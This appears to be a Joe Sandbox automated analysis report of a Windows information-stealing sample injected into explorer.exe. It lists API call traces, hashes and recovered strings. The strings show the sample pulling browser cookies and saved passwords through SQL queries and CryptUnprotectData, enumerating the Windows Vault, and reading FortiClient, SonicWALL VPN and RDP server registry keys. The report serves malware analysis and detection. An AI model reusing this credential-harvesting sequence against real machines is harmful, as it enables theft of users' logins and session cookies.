                                                                                                                                        • Instruction Fuzzy Hash: CE31876260868345EB209B66E4905E97B50FB46BC8F404231DE6DC77D6FEBCD455CB10
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AppendPathlstrcpy
                                                                                                                                        • String ID: ":"$"},$Software\Fortinet\FortiClient\Sslvpn\Tunnels
                                                                                                                                        • API String ID: 3043196718-4231764533
                                                                                                                                        • Opcode ID: 41717d2b28b12b861b56b77c4a305ba195c6b11fe973075c33dbed15fd8a1f2e
                                                                                                                                        • Instruction ID: 945540a0e8cd536f13c280ed015ed0af5335ec934827b5bd8c85cec59c015ce3
                                                                                                                                        • Opcode Fuzzy Hash: 41717d2b28b12b861b56b77c4a305ba195c6b11fe973075c33dbed15fd8a1f2e
                                                                                                                                        • Instruction Fuzzy Hash: 03318D72608A8181DB209F62E8442E97765FB89BC4F544232EE6D877D9EE7CD504CB10
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseCreateValue
                                                                                                                                        • String ID: ?
                                                                                                                                        • API String ID: 1818849710-1684325040
                                                                                                                                        • Opcode ID: 95ba9ea116202154f80c3a303d626d01697fe8fb572a65aab9065d47d504427e
                                                                                                                                        • Instruction ID: 158b1072d104891cdb721a74c91cba4365e7a2fa3e9910707f7fbf3ec1a5b1d0
                                                                                                                                        • Opcode Fuzzy Hash: 95ba9ea116202154f80c3a303d626d01697fe8fb572a65aab9065d47d504427e
                                                                                                                                        • Instruction Fuzzy Hash: 8221C273A147808AE7208F75A8402ED7BA4FB5979CF540325EA9C43B99DF7CC144CB10
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HeapValue$AppendFreePathProcesslstrcpy
                                                                                                                                        • String ID: "},$Software\SonicWALL\SSL-VPN NetExtender\Standalone\Profiles
                                                                                                                                        • API String ID: 784796242-1893226844
APIs
Memory Dump Source
• Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
• Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
Similarity
• API ID: Enum$CloseOpen
• String ID:
• API String ID: 1701607978-0
APIs
Memory Dump Source
• Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
• Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
Similarity
• API ID: Process$AddressCurrentLibraryLoadProcWow64
• String ID:
• API String ID: 4035193891-0
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
• Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
Similarity
• API ID: Value$AppendPathlstrcpy
• String ID: Software\Microsoft\Terminal Server Client\Servers
• API String ID: 19203174-1233151749
APIs
• GetEnvironmentVariableW.KERNEL32 ref: 00007FF6F2D6FE11
• lstrcatW.KERNEL32 ref: 00007FF6F2D6FE1E
  • Part of subcall function 00007FF6F2D6FF3C: lstrlenW.KERNEL32 ref: 00007FF6F2D6FF62
  • Part of subcall function 00007FF6F2D6FF3C: lstrlenW.KERNEL32 ref: 00007FF6F2D6FF7E
  • Part of subcall function 00007FF6F2D6FF3C: WideCharToMultiByte.KERNEL32 ref: 00007FF6F2D6FFA7
  • Part of subcall function 00007FF6F2D6FF3C: PathFileExistsA.SHLWAPI ref: 00007FF6F2D6FFB0
  • Part of subcall function 00007FF6F2D6FF3C: OpenFile.KERNEL32 ref: 00007FF6F2D6FFC9
  • Part of subcall function 00007FF6F2D6FF3C: GetFileSize.KERNEL32 ref: 00007FF6F2D6FFE9
  • Part of subcall function 00007FF6F2D6FF3C: CreateFileMappingA.KERNEL32 ref: 00007FF6F2D70020
  • Part of subcall function 00007FF6F2D6FF3C: MapViewOfFile.KERNEL32 ref: 00007FF6F2D70041
  • Part of subcall function 00007FF6F2D6FF3C: __memcpy.DELAYIMP ref: 00007FF6F2D70053
  • Part of subcall function 00007FF6F2D6FF3C: UnmapViewOfFile.KERNEL32 ref: 00007FF6F2D7005E
  • Part of subcall function 00007FF6F2D6FF3C: CloseHandle.KERNEL32 ref: 00007FF6F2D70067
  • Part of subcall function 00007FF6F2D6FF3C: CloseHandle.KERNEL32 ref: 00007FF6F2D70070
  • Part of subcall function 00007FF6F2D6F280: __memcpy.DELAYIMP ref: 00007FF6F2D6F29E
  • Part of subcall function 00007FF6F2D625B4: GetProcessHeap.KERNEL32 ref: 00007FF6F2D625C1
  • Part of subcall function 00007FF6F2D625B4: RtlFreeHeap.NTDLL ref: 00007FF6F2D625CF
Strings
Memory Dump Source
• Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
• Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
Similarity
• API ID: File$CloseHandleHeapView__memcpylstrlen$ByteCharCreateEnvironmentExistsFreeMappingMultiOpenPathProcessSizeUnmapVariableWidelstrcat
• String ID: APPDATA
• API String ID: 2395011915-4054820676

Execution Graph

Execution Coverage: 3.8%
Dynamic/Decrypted Code Coverage: 50.1%
Signature Coverage: 3.1%
Total number of Nodes: 802
Total number of Limit Nodes: 82
2760128 36 API calls 29149 275cb2a _allmul _allmul 28621 2752b15 28622 2751953 6 API calls 28621->28622 28623 2752b1f FindFirstFileW 28622->28623 28625 2752c5c 28623->28625 28644 2752b4e 28623->28644 28626 2751011 3 API calls 28625->28626 28628 2752c63 28626->28628 28627 2752b59 lstrcmpiW 28630 2752b71 lstrcmpiW 28627->28630 28631 2752c3d FindNextFileW 28627->28631 28632 2751011 3 API calls 28628->28632 28629 2751953 6 API calls 28629->28644 28630->28631 28630->28644 28633 2752c51 FindClose 28631->28633 28631->28644 28634 2752c6a 28632->28634 28633->28625 28635 275199d 9 API calls 28637 2752bdf StrStrIW 28635->28637 28636 27519b4 lstrlenW 28636->28644 28638 2752c10 StrStrIW 28637->28638 28641 2752bf1 28637->28641 28638->28641 28639 2751011 3 API calls 28639->28631 28640 2751cf7 GetProcessHeap RtlAllocateHeap lstrlenW RtlComputeCrc32 28640->28641 28641->28638 28641->28639 28641->28640 28646 275278e 41 API calls 28641->28646 28643 275199d 9 API calls 28643->28644 28644->28627 28644->28629 28644->28635 28644->28636 28644->28643 28645 2751011 3 API calls 28644->28645 28645->28644 28646->28638 28647 2753717 28648 2751b6a 2 API calls 28647->28648 28651 275372e 28648->28651 28649 2753c23 28651->28649 28697 2751000 GetProcessHeap RtlAllocateHeap 28651->28697 28652 275376c GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 28653 275379e 28652->28653 28654 27537a8 28652->28654 28711 275349b 31 API calls 28653->28711 28698 27a4bec 28654->28698 28657 2753c15 DeleteFileW 28658 2751011 3 API calls 28657->28658 28658->28649 28659 27537b3 28659->28657 28660 2753c0c 28659->28660 28709 2751000 GetProcessHeap RtlAllocateHeap 28659->28709 28661 27a3848 76 API calls 28660->28661 28661->28657 28663 27537e3 28664 27702ec 107 API calls 28663->28664 28685 27537ee 28664->28685 28665 2753bcc 28712 276fb92 93 API calls 28665->28712 28667 2753bd9 lstrlen 28668 2753c05 28667->28668 28669 2753be5 28667->28669 28671 2751011 3 API calls 28668->28671 28713 2751798 lstrlen 28669->28713 28671->28660 
28672 2753bf3 28714 2751798 lstrlen 28672->28714 28673 2753a37 CryptUnprotectData 28673->28685 28674 2753833 RtlCompareMemory 28674->28673 28674->28685 28675 27702ec 107 API calls 28675->28685 28677 2753bfc 28715 2751798 lstrlen 28677->28715 28679 2753867 RtlZeroMemory 28710 2751000 GetProcessHeap RtlAllocateHeap 28679->28710 28681 2751011 3 API calls 28681->28685 28682 2753b0f lstrlen 28683 2753b21 lstrlen 28682->28683 28682->28685 28683->28685 28684 2751fa7 19 API calls 28684->28685 28685->28665 28685->28673 28685->28674 28685->28675 28685->28679 28685->28681 28685->28682 28685->28684 28686 2753987 lstrlen 28685->28686 28687 2752112 5 API calls 28685->28687 28690 2753ba3 lstrcat 28685->28690 28691 2751000 GetProcessHeap RtlAllocateHeap 28685->28691 28692 2752112 5 API calls 28685->28692 28686->28685 28689 2753999 lstrlen 28686->28689 28688 2753b66 wsprintfA lstrlen 28687->28688 28688->28685 28688->28690 28689->28685 28690->28685 28691->28685 28693 27539de wsprintfA lstrlen 28692->28693 28694 2753a0d 28693->28694 28695 2753a1b lstrcat 28693->28695 28694->28695 28696 2751011 3 API calls 28695->28696 28696->28685 28697->28652 28716 27a307c 28698->28716 28700 27a4c01 28708 27a4c44 28700->28708 28726 276c54d memset 28700->28726 28702 27a4c18 28727 276c871 21 API calls 28702->28727 28704 27a4c2a 28728 276c518 19 API calls 28704->28728 28706 27a4c33 28706->28708 28729 27a486f 89 API calls 28706->28729 28708->28659 28709->28663 28710->28685 28711->28654 28712->28667 28713->28672 28714->28677 28715->28668 28717 27a3095 28716->28717 28725 27a308e 28716->28725 28718 27a30ad 28717->28718 28743 27566ce 17 API calls 28717->28743 28720 27a30ed memset 28718->28720 28718->28725 28721 27a3108 28720->28721 28722 27a3116 28721->28722 28744 275c59d 17 API calls 28721->28744 28722->28725 28730 2756512 28722->28730 28725->28700 28726->28702 28727->28704 28728->28706 28729->28708 28745 275685c 28730->28745 28732 275651d 28732->28725 28733 2756519 28733->28732 28734 275bfec GetSystemInfo 
28733->28734 28748 27565bd 28734->28748 28736 275c00e 28737 27565bd 16 API calls 28736->28737 28738 275c01a 28737->28738 28739 27565bd 16 API calls 28738->28739 28740 275c026 28739->28740 28741 27565bd 16 API calls 28740->28741 28742 275c032 28741->28742 28742->28725 28743->28718 28744->28722 28746 27a307c 17 API calls 28745->28746 28747 2756861 28746->28747 28747->28733 28749 27a307c 17 API calls 28748->28749 28750 27565c2 28749->28750 28750->28736 29151 2776b14 memset memcpy _allmul 29273 27684a7 30 API calls 29152 27713ca 105 API calls 28987 275411b 28988 2754045 50 API calls 28987->28988 28989 275412b 28988->28989 28990 2754045 50 API calls 28989->28990 28991 275413b 28990->28991 29278 2766d01 _allmul 29062 2754108 29063 2754045 50 API calls 29062->29063 29064 2754118 29063->29064 29155 2786f06 24 API calls 29065 27b9304 29067 27b9344 29065->29067 29066 27b9584 29066->29066 29067->29066 29068 27b94da LoadLibraryA 29067->29068 29072 27b951f VirtualProtect VirtualProtect 29067->29072 29069 27b94f1 29068->29069 29069->29067 29071 27b9503 GetProcAddress 29069->29071 29071->29069 29073 27b9519 29071->29073 29072->29066 29156 2775f08 113 API calls 29157 27713ca 102 API calls 29280 275d1f7 memset _allmul _allmul 29281 27549f1 13 API calls 29160 2769ff0 32 API calls 28573 27547fa 28580 275479c 28573->28580 28576 275479c 23 API calls 28577 2754813 28576->28577 28578 275479c 23 API calls 28577->28578 28579 275481f 28578->28579 28581 2751afe 10 API calls 28580->28581 28583 27547af 28581->28583 28582 27547f1 28582->28576 28583->28582 28584 275199d 9 API calls 28583->28584 28585 27547bf 28584->28585 28586 27547ea 28585->28586 28588 2751d4a 18 API calls 28585->28588 28587 2751011 3 API calls 28586->28587 28587->28582 28588->28585 29282 27a55eb IsProcessorFeaturePresent 29283 27599e1 strncmp 29286 275c9ea _allmul _alldiv 28754 27563dd 28757 275b87b 28754->28757 28755 27563f4 28758 275b88d memset 28757->28758 28765 275b8e5 28758->28765 28760 275b609 memset 28760->28765 28761 
275ba3c 28761->28755 28762 275b965 CreateFileW 28762->28765 28765->28758 28765->28760 28765->28761 28765->28762 28766 275ba14 28765->28766 28767 275ba41 28765->28767 28772 275b64b 18 API calls 28765->28772 28773 275bb9f 18 API calls 28765->28773 28774 275a2aa 17 API calls 28765->28774 28775 275a1c6 18 API calls 28766->28775 28777 27a52ae 28767->28777 28769 275ba32 28776 27a4db2 17 API calls 28769->28776 28772->28765 28773->28765 28774->28765 28775->28769 28776->28761 28778 27a52bb 28777->28778 28779 27a52d1 28778->28779 28781 278ba08 _allmul 28778->28781 28779->28761 28781->28779 28788 27515dd 28789 2751600 28788->28789 28790 27515f3 lstrlen 28788->28790 28799 2751000 GetProcessHeap RtlAllocateHeap 28789->28799 28790->28789 28792 2751608 lstrcat 28793 2751644 28792->28793 28794 275163d lstrcat 28792->28794 28800 2751333 28793->28800 28794->28793 28797 2751011 3 API calls 28798 2751667 28797->28798 28799->28792 28823 2751000 GetProcessHeap RtlAllocateHeap 28800->28823 28802 2751357 28824 275106c lstrlen MultiByteToWideChar 28802->28824 28804 2751366 28825 27512a3 RtlZeroMemory 28804->28825 28807 27513b8 RtlZeroMemory 28811 27513ed 28807->28811 28808 2751011 3 API calls 28809 27515d2 28808->28809 28809->28797 28810 27515b5 28810->28808 28811->28810 28827 2751000 GetProcessHeap RtlAllocateHeap 28811->28827 28813 27514a7 wsprintfW 28815 27514c9 28813->28815 28814 27515a1 28816 2751011 3 API calls 28814->28816 28815->28814 28828 2751000 GetProcessHeap RtlAllocateHeap 28815->28828 28816->28810 28818 2751533 28819 275159a 28818->28819 28829 275104c VirtualAlloc 28818->28829 28821 2751011 3 API calls 28819->28821 28821->28814 28822 275158a RtlMoveMemory 28822->28819 28823->28802 28824->28804 28826 27512c5 28825->28826 28826->28807 28826->28810 28827->28813 28828->28818 28829->28822 28941 27543d9 28948 2754317 _alloca_probe RegOpenKeyW 28941->28948 28944 2754317 25 API calls 28945 27543f5 28944->28945 28946 2754317 25 API calls 28945->28946 28947 2754403 28946->28947 28949 
2754343 RegEnumKeyExW 28948->28949 28950 27543cf 28948->28950 28951 27543c4 RegCloseKey 28949->28951 28955 275436d 28949->28955 28950->28944 28951->28950 28952 2751953 6 API calls 28952->28955 28953 275199d 9 API calls 28953->28955 28955->28952 28955->28953 28956 2751011 3 API calls 28955->28956 28959 275418a 16 API calls 28955->28959 28957 275439b RegEnumKeyExW 28956->28957 28957->28955 28958 27543c3 28957->28958 28958->28951 28959->28955 29165 275ebd9 37 API calls 29288 27a3dc8 24 API calls 29169 27873c4 22 API calls 29055 2759fc8 29056 2759fd3 29055->29056 29058 2759fd8 29055->29058 29057 2759ff4 HeapCreate 29057->29056 29059 275a004 29057->29059 29058->29056 29058->29057 29061 2757f70 17 API calls 29059->29061 29061->29056 29170 27713ca 103 API calls 29289 2779dbc 25 API calls 29173 27933b7 27 API calls 29174 2778ba6 7 API calls 29175 27953ad memset memcpy memset memcpy 29292 27611a0 43 API calls 29293 276fd97 19 API calls 29176 27713ca 103 API calls 29178 276cb91 18 API calls 28782 2751b9d 28783 2751bc1 28782->28783 28784 2751ba2 28782->28784 28784->28783 28785 2751ba9 GetFileAttributesW 28784->28785 28786 2751bb5 28785->28786 28830 275639e 28834 275b1e5 28830->28834 28854 275b1e3 28830->28854 28831 27563b2 28835 275b20d 28834->28835 28839 275b214 28834->28839 28890 275aeea 28835->28890 28838 275b233 28841 275b28f 28838->28841 28874 275a7ae 28838->28874 28839->28838 28839->28841 28908 275ae65 28839->28908 28841->28831 28842 275b26d 28914 275a1c6 18 API calls 28842->28914 28843 275b2d6 28887 2756a5a 28843->28887 28849 275b310 CreateFileMappingW 28850 275b37e 28849->28850 28851 275b32b MapViewOfFile 28849->28851 28915 275a1c6 18 API calls 28850->28915 28851->28850 28852 275b2e8 28851->28852 28852->28841 28852->28849 28855 275b1e5 28854->28855 28856 275b214 28855->28856 28858 275aeea 27 API calls 28855->28858 28857 275b233 28856->28857 28859 275ae65 22 API calls 28856->28859 28870 275b28f 28856->28870 28860 275a7ae 18 API calls 28857->28860 28857->28870 
28858->28856 28859->28857 28863 275b267 28860->28863 28861 275b26d 28939 275a1c6 18 API calls 28861->28939 28862 275b2d6 28864 2756a5a 17 API calls 28862->28864 28863->28861 28863->28862 28866 275a67c 22 API calls 28863->28866 28863->28870 28865 275b2e8 28864->28865 28869 275b310 CreateFileMappingW 28865->28869 28865->28870 28868 275b2be 28866->28868 28868->28861 28868->28862 28871 275b37e 28869->28871 28872 275b32b MapViewOfFile 28869->28872 28870->28831 28940 275a1c6 18 API calls 28871->28940 28872->28865 28872->28871 28876 275a7c7 28874->28876 28875 275a805 28875->28841 28875->28842 28875->28843 28878 275a67c 28875->28878 28876->28875 28916 275a1c6 18 API calls 28876->28916 28879 275a694 _alldiv _allmul 28878->28879 28880 275a6c1 28878->28880 28879->28880 28917 275a33b SetFilePointer 28880->28917 28883 275a6f0 SetEndOfFile 28884 275a6d4 28883->28884 28886 275a6ee 28883->28886 28884->28886 28921 275a1c6 18 API calls 28884->28921 28886->28842 28886->28843 28888 27a307c 17 API calls 28887->28888 28889 2756a65 28888->28889 28889->28852 28891 2756a81 memset 28890->28891 28892 275af01 28891->28892 28893 2756a81 memset 28892->28893 28900 275af07 28892->28900 28894 275af2a 28893->28894 28894->28900 28923 2757f07 28894->28923 28896 27a52ae _allmul 28898 275afd9 28896->28898 28897 275af54 28897->28896 28897->28900 28899 275b87b 21 API calls 28898->28899 28901 275affa 28899->28901 28900->28839 28902 275b020 28901->28902 28903 275b000 28901->28903 28904 275ae65 22 API calls 28902->28904 28931 275a1c6 18 API calls 28903->28931 28906 275b01c 28904->28906 28906->28900 28926 275adcc 28906->28926 28909 275ae7a 28908->28909 28910 275ae83 28909->28910 28911 275a67c 22 API calls 28909->28911 28910->28838 28912 275aea5 28911->28912 28912->28910 28938 275a1c6 18 API calls 28912->28938 28914->28841 28915->28841 28916->28875 28918 275a390 28917->28918 28919 275a36a 28917->28919 28918->28883 28918->28884 28919->28918 28922 275a1c6 18 API calls 28919->28922 28921->28886 28922->28918 
28932 2757ec7 28923->28932 28929 275ade4 28926->28929 28927 275ae5f 28927->28900 28929->28927 28930 275bafc 20 API calls 28929->28930 28937 275a39e 18 API calls 28929->28937 28930->28929 28931->28906 28933 2757ed9 28932->28933 28935 2757ed4 28932->28935 28936 2756e6a 17 API calls 28933->28936 28935->28897 28936->28935 28937->28929 28938->28910 28939->28870 28940->28870 29295 2751198 GetProcessHeap RtlAllocateHeap CryptBinaryToStringA CryptBinaryToStringA 29179 275bf9a _alldiv 29296 2777d8b _allrem memcpy 29183 276ab8b 19 API calls

Control-flow Graph

APIs
  • Part of subcall function 02751B6A: CreateFileW.KERNEL32(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,02752893,00000000,00000000,00000000,?), ref: 02751B82
  • Part of subcall function 02751B6A: CloseHandle.KERNEL32(00000000), ref: 02751B8F
• GetTempPathW.KERNEL32(00000104,00000000), ref: 02753778
• GetTempFileNameW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02753782
• DeleteFileW.KERNEL32(00000000), ref: 02753789
• CopyFileW.KERNEL32(?,00000000,00000000), ref: 02753794
• RtlCompareMemory.NTDLL(00000000,?,00000003), ref: 0275383B
• RtlZeroMemory.NTDLL(?,00000040), ref: 02753870
• lstrlen.KERNEL32(?,?,?,?,?), ref: 0275398B
• lstrlen.KERNEL32(00000000), ref: 0275399A
• wsprintfA.USER32 ref: 027539F1
• lstrlen.KERNEL32(00000000,?,?), ref: 027539FD
• lstrcat.KERNEL32(00000000,?), ref: 02753A21
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 02753A49
• lstrlen.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 02753B13
• lstrlen.KERNEL32(00000000), ref: 02753B22
• wsprintfA.USER32 ref: 02753B79
• lstrlen.KERNEL32(00000000), ref: 02753B85
• lstrcat.KERNEL32(00000000,?), ref: 02753BA9
• lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 02753BDA
• DeleteFileW.KERNEL32(00000000,00000000,?), ref: 02753C16
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
Similarity
• API ID: lstrlen$File$DeleteMemoryTemplstrcatwsprintf$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
• String ID: %sTRUE%s%s%s%s%s$0$COOKIES$FALSE$SELECT host_key,path,is_secure,name,encrypted_value FROM cookies$TRUE$v1
• API String ID: 584740257-404540950
• Opcode ID: 690a921388d7a2daf90bc0710df98d5f811de8da34d2b74a56705e1cfd330789
• Instruction ID: fa94ac2788205ba3fd72da0bbc087a9d5905fd9a8994ded8502302c6e7aec76e
• Opcode Fuzzy Hash: 690a921388d7a2daf90bc0710df98d5f811de8da34d2b74a56705e1cfd330789
• Instruction Fuzzy Hash: BFE19D716083519FDB12DF24C854B2FBBEAAFC5798F04896CF885962A0DBB5C805CB52

Control-flow Graph

APIs
• RtlZeroMemory.NTDLL(?,00000114), ref: 027521AF
• GetVersionExW.KERNEL32(?), ref: 027521BE
• LoadLibraryW.KERNEL32(vaultcli.dll), ref: 027521E8
• GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 0275220A
• GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 02752214
• GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 02752220
• GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 0275222A
• GetProcAddress.KERNEL32(00000000,VaultFree), ref: 02752236
• RtlCompareMemory.NTDLL(?,027B1110,00000010), ref: 027522E8
• RtlCompareMemory.NTDLL(?,027B1110,00000010), ref: 0275236C
  • Part of subcall function 02751953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,02752F0C), ref: 02751973
  • Part of subcall function 02751953: lstrlenW.KERNEL32(027A6564,?,?,02752F0C), ref: 02751978
  • Part of subcall function 02751953: lstrcatW.KERNEL32(00000000,?,?,?,02752F0C), ref: 02751990
  • Part of subcall function 02751953: lstrcatW.KERNEL32(00000000,027A6564,?,?,02752F0C), ref: 02751994
• StrStrIW.SHLWAPI(?,Internet Explorer), ref: 027523FE
• FreeLibrary.KERNEL32(00000000), ref: 02752493
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
Similarity
• API ID: AddressProc$Memory$CompareLibrarylstrcatlstrlen$FreeLoadVersionZero
• String ID: Internet Explorer$VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
• API String ID: 2583887280-2831467701
                                                                                                                                        • Opcode ID: c011b48656fd0515c17a5560e7a5011165e443d2da37c84e39ef1fbe6bc7f475
                                                                                                                                        • Instruction ID: 66c4944bf8a0b77f340c393dc4d3486add4e70a026df807341689fbad7a1f3c1
                                                                                                                                        • Opcode Fuzzy Hash: c011b48656fd0515c17a5560e7a5011165e443d2da37c84e39ef1fbe6bc7f475
                                                                                                                                        • Instruction Fuzzy Hash: AF918B71A083519FDB18DF65C894A2BFBEAAFC8704F44482DFD8997251EBB0D801CB52

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02751B6A: CreateFileW.KERNEL32(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,02752893,00000000,00000000,00000000,?), ref: 02751B82
                                                                                                                                          • Part of subcall function 02751B6A: CloseHandle.KERNEL32(00000000), ref: 02751B8F
                                                                                                                                        • GetTempPathW.KERNEL32(00000104,00000000), ref: 027530F9
                                                                                                                                        • GetTempFileNameW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02753103
                                                                                                                                        • DeleteFileW.KERNEL32(00000000), ref: 0275310A
                                                                                                                                        • CopyFileW.KERNEL32(?,00000000,00000000), ref: 02753115
                                                                                                                                        • RtlCompareMemory.NTDLL(00000000,00000000,00000003), ref: 027531A4
                                                                                                                                        • RtlZeroMemory.NTDLL(?,00000040), ref: 027531D7
                                                                                                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 027532DF
                                                                                                                                        • DeleteFileW.KERNEL32(00000000,00000000,?), ref: 0275339C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$DeleteMemoryTemp$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
                                                                                                                                        • String ID: 0$@$SELECT origin_url,username_value,password_value FROM logins$v1
                                                                                                                                        • API String ID: 2757140130-4052020286
                                                                                                                                        • Opcode ID: 080ca261b1708006b4be5b85fbcf3e5b0f5075f870b28a2b6b9f06a00962bf4f
                                                                                                                                        • Instruction ID: afee89150d402cc43c5579136e75e8bca7e2841f1354463275897cbd6e7858a6
                                                                                                                                        • Opcode Fuzzy Hash: 080ca261b1708006b4be5b85fbcf3e5b0f5075f870b28a2b6b9f06a00962bf4f
                                                                                                                                        • Instruction Fuzzy Hash: 5A91AE71508351ABD711DF24C844F2FFBEAAFC5799F44492CF889962A0DBB5D804CB62

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
